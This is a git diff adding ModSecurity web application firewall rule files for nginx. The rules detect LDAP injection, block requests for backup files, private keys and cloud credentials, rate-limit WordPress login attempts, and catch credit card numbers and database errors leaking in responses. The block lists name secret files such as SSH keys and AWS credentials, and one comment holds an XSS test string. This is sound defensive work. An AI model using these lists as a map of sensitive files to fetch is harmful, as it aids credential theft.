+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/QTA_Tracker/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|QUERY_STRING|ARGS_NAMES|ARGS|XML:/*|!ARGS:html|!ARGS:source|!ARGS:/newpw/|!ARGS:/oldpw/|!ARGS:/bps_customcode/|!ARGS:/pass/|!ARGS:snippet|!ARGS:template_data|!ARGS:notes|!ARGS:/search_pattern/|!ARGS:filecontent|!ARGS:actionFilter|!ARGS:/password/|!ARGS:/pwd/|!ARGS:/deny/|!ARGS:/^pass/|!ARGS:m1_contents|!ARGS:/jform/|!ARGS:prefix|!ARGS:suffix|!ARGS:content|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/text/|!ARGS:/wp_autosave/|!ARGS:/^install/|!ARGS:/message/|!ARGS:/msg/|!ARGS:txt|!ARGS:form "(?:\((?:\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\b\W*?=|[^\w\x80-\xFF]*?[\!\&\|][^\w\x80-\xFF]*?\()|\)[^\w\x80-\xFF]*?\([^\w\x80-\xFF]*?[\!\&\|])" "phase:2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,deny,log,auditlog,status:501,msg:'Atomicorp.com WAF Rules: LDAP Injection Attack',id:'340213',rev:8,logdata:'%{TX.0}',severity:'2'"
+
+SecMarker END_340213
+
+#Information LEakage rules
+SecRule REQUEST_FILENAME "@pm ~ .bak .vscode .old .orig .copy .backup .sw .mdb vi.recover vim.recover sql config .save private-key privatekey id_rsa id_dsa .pem " "id:333849,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334395,t:none,pass,nolog,noauditlog,skipAfter:END_LEAKAGE_1"
+
+#wordpress and other backup php config files
+SecRule REQUEST_FILENAME "(wp-)?config\.(php)?\.(?:bac?k|o(?:ld|rig)|copy|tmp|s(?:ave|wp)|vim?\.|~)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390597,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup system/application config file (disable this rule only if you want to allow anyone access to these backup files)'"
+
+SecRule REQUEST_FILENAME "[a-z0-9]~$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390581,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)'"
+
+SecRule REQUEST_FILENAME "(?:\.bak|\.bak\.php)$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390582,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)'"
+
+SecRule REQUEST_FILENAME "\.old$" "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390583,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)'"
+
+SecRule REQUEST_FILENAME "debug\.log$" "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390784,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access debug log file (disable this rule if you require access to files that end with debug.log)'"
+
+SecRule REQUEST_FILENAME "\.log$" "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390786,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access log file (disable this rule if you require access to files that end with .log)'"
+
+SecRule REQUEST_FILENAME "\.orig$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390584,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)'"
+
+SecRule REQUEST_FILENAME "\.copy$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390586,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)'"
+
+SecRule REQUEST_FILENAME "\.sw(?:f|d|z)$" "id:367888,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,pass,skipAfter:END_SWF"
+
+SecRule REQUEST_FILENAME "\.sw[a-z]$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390587,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)'"
+SecMarker END_SWF
+
+SecRule REQUEST_FILENAME "\.backup$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390588,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)'"
+
+SecRule REQUEST_FILENAME "\.mdb$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:390589,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .mdb)'"
+
+SecRule REQUEST_FILENAME "vim?\.recover" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350589,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access vi recovery file (disable this rule if you require access to files that end with .mdb)'"
+
+SecRule REQUEST_FILENAME "\.sql(?:$|\.(?:zip|(?:t|r)ar\.?g?z?|t?(?:g|b)z|old|ba(?:k|c)u?p?)$)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350590,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)'"
+
+SecRule REQUEST_FILENAME "(?:id_(?:r|d)sa$|key\.pem$|(?:myserver|private-?key)\.key$)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350591,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys'"
+
+SecRule REQUEST_FILENAME "(?:ecs\.config|cloudwatch\.cred)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350592,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access AWS credentials'"
+
+SecRule REQUEST_FILENAME "\.vscode/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,id:350593,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access stored vscode passwords'"
+
+SecMarker END_LEAKAGE_1
+
+SecRule RESPONSE_BODY "@pm ---ASL-CONFIG-FILE--- Horde:" "id:333850,phase:4,t:none,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:4,id:334396,t:none,pass,nolog,noauditlog,skipAfter:END_LEAKAGE_2"
+
+#prevents exposure of ASL config files on customer machine
+SecRule RESPONSE_BODY "---ASL-CONFIG-FILE---" "deny,log,auditlog,phase:4,t:none,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: ASL Configuration Leak Prevented',id:'380013',severity:'2',rev:1"
+
+#prevents exposure of ASL config files on customer machine
+SecRule RESPONSE_BODY "<title>Horde: System Capabilities Test</title>" "deny,log,auditlog,phase:4,t:none,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Horde system configuration Leak Prevented',id:'360013',severity:'2',rev:1"
+
+SecMarker END_LEAKAGE_2
+
+#Rules to catch attack tools
+#generic XSS test pattern
+#>:<script>alert(12345)</script>
+
+#Postive rules for GUI
+SecRule SERVER_PORT "@streq 30000" "phase:2,deny,log,auditlog,status:403,t:none,id:393585,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: XSS attack on ASL GUI',chain"
+SecRule ARGS:event "!@rx ^[a-z_]+$" "t:none,t:lowercase"
+
+#special exclusions for this rule file
+
+
+
+
+#
+
+
+
+#below, ARGS:grossprofit case #3668
+
diff --git a/nginx-waf/11_asl_brute_enhanced.conf b/nginx-waf/11_asl_brute_enhanced.conf
new file mode 100644
index 0000000..50f58b2
--- /dev/null
+++ b/nginx-waf/11_asl_brute_enhanced.conf
@@ -0,0 +1,73 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.5+
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2016 by Atomicorp, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+#Commercial rules timers
+#XMLRPC rate limiting timer
+#SecAction "phase:2,id:311220,nolog,noauditlog,pass,deprecatevar:ip.count_x=1/20"
+
+#Limit exceeded blocks
+SecRule IP:COUNT_X "@gt 5"  "chain,phase:2,severity:2,id:311221,rev:2,deny,status:403,log,auditlog,msg:'Atomicorp WAF Rules : XMLRPC - Ratelimiting calls/possible attack'"
+SecRule REQUEST_FILENAME "/xmlrpc" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI "/wp-login\.php\?action=logout" "phase:2,chain,id:339318,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_BRUTE_OUT_EN"
+SecRule REQUEST_METHOD "GET" "t:none"
+
+SecRule IP:FAILED_AUTH_ATTEMPT "@gt 5"  "chain,phase:2,id:377370,rev:3,t:none,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules - Login Detection: Multiple Wordpress Authentication Failures from the same IP.',logdata:'Number of Authentication Failures in 60 seconds: %{ip.failed_auth_attempt}'"
+SecRule REQUEST_FILENAME "/wp-login\.php" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+#SecRule RESPONSE_BODY "@pm incorrect passwort password wrong match valid unrecognized succeed re-type error sorry, messagestackerror error-msg blank usuario isadmin" #phase:4,id:343892,pass,t:none,nolog,noauditlog,skip:1
+
+
+SecRule REQUEST_FILENAME "/wp-login\.php"  "chain,phase:4,id:377366,rev:2,t:none,t:lowercase,t:urlDecodeUni,deny,log,auditlog,status:200,msg:'Atomicorp.com WAF Rules - Login Detection: Wordpress Authentication Failure',logdata:'Number of Authentication Failures in 60 seconds: %{ip.failed_auth_attempt} '"
+  SecRule REQUEST_METHOD "@streq POST" "t:none,chain"
+        SecRule RESPONSE_BODY "<strong>E(?:rror|RROR)</strong>\: ?(?:The password you entered for the username|Incorrect password|(?:Invalid|Unknown) username)" "t:none,setvar:ip.failed_auth_attempt=+1,expirevar:ip.failed_auth_attempt=60"
+
+SecRule REQUEST_METHOD "@streq POST" "phase:5,chain,t:none,auditlog,pass,log,msg:'Atomicorp.com WAF Rules - Login Failure Detection: Wordpress Authentication Failure',logdata:'Number of Authentication Failures in 60 seconds: %{ip.failed_auth_attempt} ',id:'377369',rev:2,severity:'4',tag:'no_ar',setvar:ip.failed_auth_attempt=+1,expirevar:ip.failed_auth_attempt=60"
+SecRule REQUEST_URI "/wp-login\.php" "t:none,t:urlDecodeUni,t:lowercase,chain"
+        SecRule RESPONSE_STATUS "200"  "t:none"
+
+
+SecRule REQUEST_FILENAME "/wp-login\.php"  "chain,phase:4,id:377365,rev:2,t:none,t:lowercase,t:urlDecodeUni,deny,log,auditlog,status:200,msg:'Atomicorp.com WAF Rules - Login Detection: Wordpress Admin Authentication Failure',logdata:'Number of Authentication Failures in 60 seconds: %{ip.failed_auth_attempt}'"
+  SecRule REQUEST_METHOD "@streq POST" "t:none,chain"
+    SecRule ARGS:log "admin" "chain,t:none,t:lowercase,t:urlDecodeUni"
+        SecRule RESPONSE_BODY "<strong>E(?:rror|RROR)</strong>\: ?(?:The password you entered for the username|Incorrect password|(?:Invalid|Unknown) username)" "t:none,setvar:ip.failed_auth_attempt=+1,expirevar:ip.failed_auth_attempt=60"
+
+SecMarker END_BRUTE_OUT_EN
+
+#XMLRPC code block
+#SecRule REQUEST_FILENAME "/xmlrpc" "t:none,t:urlDecodeUni,t:lowercase"
+
+#detect old XMLRPC attacks and increment timer for litespeed systems
+SecRule RESPONSE_BODY "fault(?:Code|String)"  "chain,phase:4,severity:2,id:311222,pass,t:none,log,auditlog,status:200,msg:'Atomicorp.com WAF Rules - Login Detection: WordPress XMLRPC Failure',setvar:ip.count_x=+1,expirevar:ip.count_x=60"
+SecRule REQUEST_FILENAME "/xmlrpc" "t:none,t:urlDecodeUni,t:lowercase"
diff --git a/nginx-waf/11_asl_data_loss.conf b/nginx-waf/11_asl_data_loss.conf
new file mode 100644
index 0000000..959c721
--- /dev/null
+++ b/nginx-waf/11_asl_data_loss.conf
@@ -0,0 +1,139 @@
+SecRule REQUEST_FILENAME "/ajax/getsymptoms\.php" "phase:2,id:92738,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=361008"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Created by the Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005-2021 by Atomicorp, Inc. all rights reserved.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+SecDefaultAction "log,deny,auditlog,phase:4"
+
+#skip for ASL GUI
+SecRule SERVER_PORT "@streq 30000" "phase:4,id:333710,pass,t:none,nolog,noauditlog,skipAfter:END_POTENTIAL_CREDIT_CARD_OUT"
+
+#Detect sensitive numbers in output
+SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})(?:[^\d]|$)"         "phase:4,id:333711,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:4,id:333712,t:none,pass,nolog,noauditlog,skipAfter:END_POTENTIAL_CREDIT_CARD_OUT"
+
+
+# GSA SmartPay
+SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)((?:5568|4(?:486|716))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|8699\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)"         "chain,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,pass,msg:'Atomicorp.com WAF Rules: Potential credit card number detected in output (NOT BLOCKED) - GSA SmartPay Card Number sent from site to user',id:'361020',severity:'1',tag:'no_ar'"
+        SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}"
+                SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1}"
+
+
+# MasterCard
+
+SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(5[1-5]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)"         "chain,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,pass,msg:'Atomicorp.com WAF Rules: MasterCard Credit Card Number sent from site to user',id:'361006',severity:'1',tag:'no_ar'"
+        SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}"
+                SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1}"
+
+# Visa
+SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(4\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d(?:\d{3})??)(?:[^\d]|$)"         "chain,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,pass,msg:'Atomicorp.com WAF Rules:  Potential credit card number detected in output (NOT BLOCKED) -Visa Credit Card Number sent from site to user',id:'361008',severity:'1',tag:'no_ar'"
+        SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}"
+                SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1}"
+
+# American Express
+SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(3[47]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" 	"chain,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,pass,msg:'Atomicorp.com WAF Rules:  Potential credit card number detected in output (NOT BLOCKED) -American Express Credit Card Number sent from site to user',id:361010,severity:'1',tag:'no_ar'"
+ SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}"
+                SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1}"
+
+
+# Diners Club
+SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)((?:30[0-5]|3[68]\d)\d\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2})(?:[^\d]|$)" 	"chain,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,pass,msg:'Atomicorp.com WAF Rules:  Potential credit card number detected in output (NOT BLOCKED) -Diners Club Credit Card Number sent from site to user',id:'361012',severity:'1',tag:'no_ar'"
+ SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}"
+                SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1}"
+
+
+# enRoute
+#SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "(?:^|[^\d])(?<!google_ad_client = \"pub-)(2(?:014|149)\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2}|55\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" #	"logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,pass,msg:'Atomicorp.com WAF Rules:  Potential credit card number detected in output (NOT BLOCKED) -enRoute Credit Card Number sent from site to user',id:'361014',severity:'1',tag:'no_ar'"
+
+# Discover
+SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(6(?:011|5\d{2})\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" 	"chain,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,pass,msg:'Atomicorp.com WAF Rules:  Potential credit card number detected in output (NOT BLOCKED) -Discover Credit Card Number sent from site to user',id:'361016',severity:'1',tag:'no_ar'"
+        SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}"
+                SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1}"
+
+
+# JCB
+SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(3\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|(?:1800|21(?:31|00))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)"         "chain,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,pass,msg:'Atomicorp.com WAF Rules:  Potential credit card number detected in output (NOT BLOCKED) -JCB Credit Card Number sent from site to user',id:'361018',severity:'1',tag:'no_ar'"
+        SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}"
+                SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1}"
+
+
+SecMarker END_POTENTIAL_CREDIT_CARD_OUT
+
+SecRule REQUEST_URI "^/index\.php\?module=asl" 	"phase:4,id:349852,pass,t:none,t:lowercase,nolog,noauditlog,chain,skipAfter:END_DLP_OUTPUT"
+SecRule SERVER_PORT "@streq 30000"
+
+#Detect potential error messages that leak sensitive information
+SecRule RESPONSE_BODY "@pm hsqldb DB2 error illegal unexpected Ingres maxdb ibase_ jdbc exception database ODBC Tomcat DM_QUERY_E_SYNTAX mysql_connect( MySQL Warning SQLite. PostgreSQL ORA- SQLException Driver oci_ ora_ exception SQLSTATE" "phase:4,t:none,pass,nolog,noauditlog,skip:1,id:333713,tag:'no_ar'"
+SecAction "phase:4,t:none,pass,nolog,noauditlog,id:333714,skipAfter:END_POTENTIAL_ERROR_LEAK"
+
+SecRule RESPONSE_BODY "<title>Apache Tomcat.{,512}Error report"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential Error Message with sensitive information sent from tomcat',id:'361019',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "\bWarning: mysql_connect\(\)\:"         "phase:4,rev:1,t:none,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Atomicorp.com WAF Rules:  Potential SQL Information Leakage',id:'361021',severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "You have an error in your SQL syntax; check the manual "         "phase:4,rev:2,t:none,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Atomicorp.com WAF Rules:  Potential SQL Information Leakage',id:'361022',severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "SQLite.Exception|System.Data.SQLite.SQLiteException|Warning:.{,100}(?:sqlite_|SQLite3::)"         "phase:4,rev:1,t:none,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Atomicorp.com WAF Rules:  Potential SQL Information Leakage',id:'361023',severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "\bsupplied argument is not a valid (?:MySQL|PostgreSQL)\b"         "phase:4,rev:1,t:none,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Potential SQL Information Leakage',id:'361024',severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "\b(?:Column count doesn't match value count at row|MySQL server version for the right syntax to use)\b"         "phase:4,rev:1,t:none,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Atomicorp.com WAF Rules: SQL Information Leakage',id:'361025',severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "(?:Warning.{,512}*(?:sqlite|SQLite3)|SQLite/JDBCDriver|SQLite\.Exception)"         "phase:4,rev:1,t:none,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Atomicorp.com WAF Rules: SQLite Information Leakage',id:'361225',severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "Exception (condition )?\d+\. Transaction rollback\."         "phase:4,rev:1,t:none,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Potential Frontbase SQL Information Leakage detected',id:'361026',severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "org\.hsqldb\.jdbc"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential hsqldb SQL Error Message with sensitive information sent',id:'361140',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "(?:Warning.{,512}ingres_|Ingres SQLSTATE|Ingres\W.{,512}Driver)"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential Informix SQL Error Message with sensitive information sent',id:'361141',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "(?:<b>Warning</b>: ibase_|Unexpected end of command in statement)"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential Informix SQL Error Message with sensitive information sent',id:'361142',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "(?:An illegal character has been found in the statement|com\.informix\.jdbc|Exception.{,512}Informix)"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential Informix SQL Error Message with sensitive information sent',id:'361143',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "(?:SQL error.{,512}POS([0-9]+)|Warning.{,512}maxdb)"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential maxDB SQL Error Message with sensitive information sent',id:'361144',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "(?:Sybase message:|Warning.{,512}sybase|Sybase.{,512}Server message)"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential maxDB SQL Error Message with sensitive information sent',id:'361145',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "(?:DB2(?: SQL error:|/6000\])|\[IBM\]\[CLI Driver\]\[DB2/6000\]|CLI Driver.{,256}DB2|db2_ ?\()"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential IBM DB2 SQL Error Message with sensitive information sent',id:'361031',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "\[DM_QUERY_E_SYNTAX\]"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential EMC Error Message with sensitive information sent',id:'361032',rev:2,severity:'1',tag:'no_ar'"
+
+
+SecRule RESPONSE_BODY "Dynamic SQL Error"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential Firebirg Error Message with sensitive information sent',id:'361033',rev:2,severity:'1',tag:'no_ar'"
+
